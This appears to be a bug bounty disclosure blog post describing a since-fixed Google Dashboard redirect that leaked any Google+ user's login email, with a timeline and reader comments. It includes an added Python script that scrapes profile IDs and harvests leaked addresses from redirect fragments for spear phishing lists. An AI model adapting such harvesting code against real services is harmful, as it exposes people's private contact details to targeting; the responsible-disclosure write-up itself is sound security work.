tl;dr I found a bug that allowed me to find the login email address of anyone with a Google+ account (even if they chose not to share it). This could be used to target specific people, or just to crawl Google+ collecting emails and tying them easily to other social accounts as step one of something nefarious (e.g. spear phishing, or other account compromise). This has now been fixed by Google’s security ninjas.
Intro
I often spend time poking around Google for security holes, as it is a great way to learn and they have a nice bounty program, so it is win-win. I’ve previously claimed a bounty for an authorisation bypass that required modifying the payload of a POST request to one of their backend systems, but today’s bug is far simpler to abuse.
I was poking around Google’s Dashboard, where you can monitor account activity etc., and as part of getting my bearings I was doing a first pass to see how the site responded to different unauthorised requests. I found that in certain conditions one such unauthorised request prompted me to log in with Google’s new “One account. All of Google” login screen, with the login email address already filled in, thus exposing it to me for an account I was not authorised for.
So I was now able to select a target from their Google+ profile and find out their login email address. Alternatively, I could just crawl Google+ profile pages collecting email addresses (and other linked social accounts), forming a nice little database for spear phishing attacks.
The Bug
I found a URL from a Google email that linked to my Dashboard with an extra parameter:
https://www.google.com/settings/dashboard?uq=114756468015607312300
I immediately recognised the long number as the one that appeared in my Google profile URL before I changed it to a ‘pretty’ one. Lots of profiles are still in the format of:
https://plus.google.com/103112588675637065591/posts
My ‘pretty’ URL one is:
https://plus.google.com/+TomAnthony/posts
And in the source code of my profile you’ll find that ID (114756468015607312300) over 400 times. So these are very much public.
Step One
Change the ID to someone else’s and see what happens:
https://www.google.com/settings/dashboard?uq=106858636547986185729
You get redirected to a login page, as expected.
Step Two
Login to your own account, and then try the same URL again:
https://www.google.com/settings/dashboard?uq=106858636547986185729
I get 302 redirected to accounts.google.com, to the ‘add session’ login rather than the primary login page, but look at what is in the URL:
The URL contains the login email address for the account identified by your selected ID number, in a hash fragment which is used to pre-populate the login field. A fragment is never sent to the server (so it will not show up in server logs), but it is fully visible to whoever holds the browser session and to any script on the page, so putting another account’s address there is a leak. I’m still learning this stuff, but I’m unsure how that would ever be a good idea.
I reported the bug before trying to dig into whether any additional account information was leaked.
Step Three
You can now visit your favourite celebrity’s page and get their email (well, their team’s email for most probably, but for some more tech savvy maybe their actual address). Alternatively, and more likely, you could target other specific victims, or just write a basic crawler to crawl Google+ tying emails to account ID numbers and to other social accounts (Twitter, LinkedIn, Facebook, their website etc.) that the user lists in their profile. This would be a great basis for spear phishing, or a first step to trying to compromise someone’s account.
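The three steps above, and the point made earlier that the 21-digit profile IDs sit in every profile page’s source, come together in the following added example. This is my own illustrative code, not the author’s or Google’s. Everything it touches is constructed: the sample profile HTML, the redirect targets (including the `AddSession` path and the `Email=` key in the fragment, which are assumptions, since the post only says the address is “in a hash fragment” and the screenshot is not reproduced here), and the two stand-in fetchers. A real run would swap `logged_in_fetch` for an authenticated GET with redirects disabled (for example `requests.get(url, cookies=..., allow_redirects=False)`), because a client that follows the 302 automatically never shows you the `Location` header that carries the leak.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Assumption: Google+ profile IDs are 21-digit numbers, as both IDs in the post are.
PROFILE_ID_RE = re.compile(r"\b\d{21}\b")
# Loose email matcher; we search the fragment for anything email-shaped rather than
# relying on a particular key name, which the post does not give.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DASHBOARD = "https://www.google.com/settings/dashboard?uq="

# A fetcher performs a GET *without* following redirects and returns (status, headers).
Fetcher = Callable[[str], Tuple[int, Dict[str, str]]]


def profile_ids_from_html(html: str) -> List[str]:
    """Distinct 21-digit IDs in a profile page's source, in order of first appearance."""
    found: List[str] = []
    for match in PROFILE_ID_RE.finditer(html):
        if match.group(0) not in found:
            found.append(match.group(0))
    return found


def email_from_location(location: str) -> Optional[str]:
    """Pull an email-shaped token out of the '#...' fragment of a redirect target."""
    fragment = unquote(urlsplit(location).fragment)  # decode %40 -> @ etc.
    match = EMAIL_RE.search(fragment)
    return match.group(0) if match else None


def leaked_email_for(uid: str, fetch: Fetcher) -> Optional[str]:
    """Step two: request the dashboard for someone else's ID and inspect the 302 target."""
    status, headers = fetch(DASHBOARD + uid)
    if status not in (301, 302, 303, 307, 308):
        return None
    location = headers.get("Location") or headers.get("location")
    return email_from_location(location) if location else None


def harvest(ids: List[str], fetch: Fetcher) -> Dict[str, str]:
    """Step three: tie each profile ID to the address the redirect gives away."""
    results: Dict[str, str] = {}
    for uid in ids:
        email = leaked_email_for(uid, fetch)
        if email:
            results[uid] = email
    return results


# --- Constructed sample data (not captured from Google) ----------------------
SAMPLE_PROFILE_HTML = """<html><body>
<a href="https://plus.google.com/103112588675637065591/posts">Posts</a>
<script>var ownerId = "103112588675637065591";</script>
<a href="https://plus.google.com/106858636547986185729/about">Friend</a>
</body></html>"""

# Hypothetical redirect targets for the logged-in case. The path and the 'Email=' key
# are assumed for illustration; the post only states the address is in the fragment.
FAKE_REDIRECTS = {
    "103112588675637065591": "https://accounts.google.com/AddSession?continue="
                             "https%3A%2F%2Fwww.google.com%2Fsettings%2Fdashboard"
                             "#Email=alice%40example.com",
    "106858636547986185729": "https://accounts.google.com/AddSession#Email=bob.smith%40example.org",
}


def logged_in_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    """Stand-in for an authenticated GET with redirects disabled (step two)."""
    uid = url.rsplit("uq=", 1)[-1]
    if uid in FAKE_REDIRECTS:
        return 302, {"Location": FAKE_REDIRECTS[uid]}
    return 200, {}


def logged_out_fetch(url: str) -> Tuple[int, Dict[str, str]]:
    """Stand-in for the unauthenticated case (step one): plain login page, nothing leaked."""
    return 302, {"Location": "https://accounts.google.com/ServiceLogin?continue=" + url}


if __name__ == "__main__":
    ids = profile_ids_from_html(SAMPLE_PROFILE_HTML)
    print("logged out:", harvest(ids, logged_out_fetch))  # {} - nothing in the URL
    print("logged in: ", harvest(ids, logged_in_fetch))   # IDs mapped to addresses
```

The two fetchers reproduce the step-one versus step-two behaviour: unauthenticated, the redirect target carries only the `continue` URL and `harvest` returns nothing; with a session, the same request yields a `Location` whose fragment gives away the address, and the crawler simply walks the IDs scraped from profile source. The same pattern (disable redirect following, then inspect `Location`, including its fragment) is the check to run against any login or session-picker flow that pre-fills identity from a URL.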
Timeline
March 4th – Initial Report
March 4th – Google replied within 4 hours seeking clarity.
March 5th – Google notified the bug was triaged.
March 6th – Google email again following up.
March 6th – I asked about disclosure. Google asked me to wait until fix verified.
March 7th – Google let me know the bug is fixed and verified.
March 14th – Google contacted me to confirm a bounty of $1337. Thanks! 🙂
(When first published, this post said Google would let me know the following week whether the bug qualified for a bounty, as the team votes on all reports at scheduled meetings; the timeline was updated when they did.)
Thanks to the Google security team, who were quick to reply, fast to fix and very communicative.
11 responses to “Google Exploit – Steal Account Login Email Addresses”
Great find, I’m a Google+ user and honestly, I could have used this little bug a couple of times myself. Keep on auditing! 🙂
Thanks!
There certainly is a temptation to sit on things like this and use them, but the bounty programs are a great incentive, and I’m not sure I’d ever want to be on the receiving end of these sorts of exploits, so couldn’t talk myself into keeping it secret!
Well somebody hacked my Google+ account and stirred up a bunch of bullshit and now I’m not allowed back on. Same with my Facebook account, Twitter account, YouTube account. All got deactivated. So how kool is that!!? Not kool at all, it fuckin sucks if you ask me. I lost a lot of friends, family and acquaintances. People I do business with I mean. Hackers need to be stopped. Unless they have some porn hacks they wanna share with me. Other than that it’s bullshit.
Noticed this bug yesterday but in my haste, it didn’t sink in how easily this could be exploited by the bad apples among us. Thanks for sharing.
Pretty smart find, and kudos for your honesty; I’d have exploited the heck out of it myself.
Awful! I couldn’t have imagined that they did that :(
That is a real big bug. I hope Google must have fixed it up by now.